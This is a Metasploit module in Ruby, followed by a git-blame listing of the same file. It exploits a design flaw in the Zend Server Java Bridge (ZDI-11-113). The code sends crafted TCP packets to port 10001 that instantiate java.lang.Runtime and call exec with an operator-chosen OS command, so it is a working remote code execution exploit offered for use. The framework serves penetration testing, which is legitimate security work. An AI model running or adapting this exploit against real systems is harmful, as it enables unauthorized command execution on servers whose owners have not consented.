modules/auxiliary/admin/zend/java_bridge.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Zend Server Java Bridge Design Flaw Remote Code Execution',
        'Description' => %q{
          This module abuses a flaw in the Zend Java Bridge Component of
          the Zend Server Framework. By sending a specially crafted packet, an
          attacker may be able to execute arbitrary code.

          NOTE: This module has only been tested with the Win32 build of the software.
        },
        'Author' => [ 'ikki', 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['OSVDB', '71420'],
          ['ZDI', '11-113'],
          ['EDB', '17078'],
        ],
        'DisclosureDate' => '2011-03-28',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(10001),
        OptString.new('CMD', [false, 'The OS command to execute', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),
      ]
    )
  end

  def run
    cmd = datastore['CMD']

    connect

    java_object = [0x33000000].pack('V') + [0x00000000].pack('V')
    java_object << [0x0c000000].pack('V') + 'CreateObject'
    java_object << [0x02000000].pack('V') + [0x00000004].pack('V')
    java_object << "\x11" + 'java.lang.Runtime' + "\x07"
    java_object << [0x00000000].pack('V')

    print_status("Creating the Java Object 'java.lang.Runtime'")
    sock.put(java_object)
    res = sock.get_once || ''
    classid = res[5, 4]

    runtime = [0x16000000].pack('V') + classid + [0x0a000000].pack('V')
    runtime << 'getRuntime' + [0x00000000].pack('V')

    print_status("Invoking static method 'getRuntime()'")
    sock.put(runtime)
    res = sock.get_once || ''
    methodid = res[5, 4]

    exec = [0x00].pack('n') + [21 + cmd.length].pack('n') + methodid
    exec << [0x04000000].pack('V') + 'exec' + [0x01000000].pack('V')
    exec << "\x04" + [0x00].pack('n') + [cmd.length].pack('n') + cmd

    print_status("Invoking method 'exec()' with parameter '#{cmd}'")
    sock.put(exec)
    success = sock.get_once || ''
    if (success =~ /\x00\x00\x00/)
      print_status('Cleaning up the JVM')
      rm = [0x11000000].pack('V') + [0xffffffff].pack('V')
      rm << [0x05000000].pack('V') + 'reset'
      rm << [0x00000000].pack('V')
      sock.put(rm)
    else
      print_error('Failed to run command...')
      disconnect
      return
    end

    disconnect
  end
end
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Auxiliary`
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`include Msf::Exploit::Remote::Tcp`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`def initialize(info = {})`
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'Zend Server Java Bridge Design Flaw Remote Code Execution',`
			`'Description' => %q{`
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`This module abuses a flaw in the Zend Java Bridge Component of`
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`the Zend Server Framework. By sending a specially crafted packet, an`
			`attacker may be able to execute arbitrary code.`
Retab modules 2013-08-30 16:28:54 -05:00
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`NOTE: This module has only been tested with the Win32 build of the software.`
			`},`
			`'Author' => [ 'ikki', 'MC' ],`
			`'License' => MSF_LICENSE,`
			`'References' => [`
			`['OSVDB', '71420'],`
			`['ZDI', '11-113'],`
			`['EDB', '17078'],`
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`],`
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`'DisclosureDate' => '2011-03-28',`
			`'Notes' => {`
			`'Stability' => [CRASH_SAFE],`
			`'SideEffects' => [IOC_IN_LOGS],`
			`'Reliability' => []`
			`}`
			`)`
			`)`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`register_options(`
			`[`
			`Opt::RPORT(10001),`
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`OptString.new('CMD', [false, 'The OS command to execute', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),`
			`]`
			`)`
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`def run`
			`cmd = datastore['CMD']`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`connect`
Retab modules 2013-08-30 16:28:54 -05:00
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`java_object = [0x33000000].pack('V') + [0x00000000].pack('V')`
			`java_object << [0x0c000000].pack('V') + 'CreateObject'`
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`java_object << [0x02000000].pack('V') + [0x00000004].pack('V')`
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`java_object << "\x11" + 'java.lang.Runtime' + "\x07"`
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`java_object << [0x00000000].pack('V')`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`print_status("Creating the Java Object 'java.lang.Runtime'")`
			`sock.put(java_object)`
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`res = sock.get_once \|\| ''`
			`classid = res[5, 4]`
Retab modules 2013-08-30 16:28:54 -05:00
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`runtime = [0x16000000].pack('V') + classid + [0x0a000000].pack('V')`
			`runtime << 'getRuntime' + [0x00000000].pack('V')`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`print_status("Invoking static method 'getRuntime()'")`
			`sock.put(runtime)`
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`res = sock.get_once \|\| ''`
			`methodid = res[5, 4]`
Retab modules 2013-08-30 16:28:54 -05:00
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`exec = [0x00].pack('n') + [21 + cmd.length].pack('n') + methodid`
			`exec << [0x04000000].pack('V') + 'exec' + [0x01000000].pack('V')`
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`exec << "\x04" + [0x00].pack('n') + [cmd.length].pack('n') + cmd`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`print_status("Invoking method 'exec()' with parameter '#{cmd}'")`
			`sock.put(exec)`
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`success = sock.get_once \|\| ''`
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`if (success =~ /\x00\x00\x00/)`
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`print_status('Cleaning up the JVM')`
			`rm = [0x11000000].pack('V') + [0xffffffff].pack('V')`
			`rm << [0x05000000].pack('V') + 'reset'`
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`rm << [0x00000000].pack('V')`
			`sock.put(rm)`
			`else`
modules/auxiliary/admin: Resolve RuboCop violations 2025-05-21 08:32:40 +10:00			`print_error('Failed to run command...')`
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`disconnect`
			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`disconnect`
			`end`
			`end`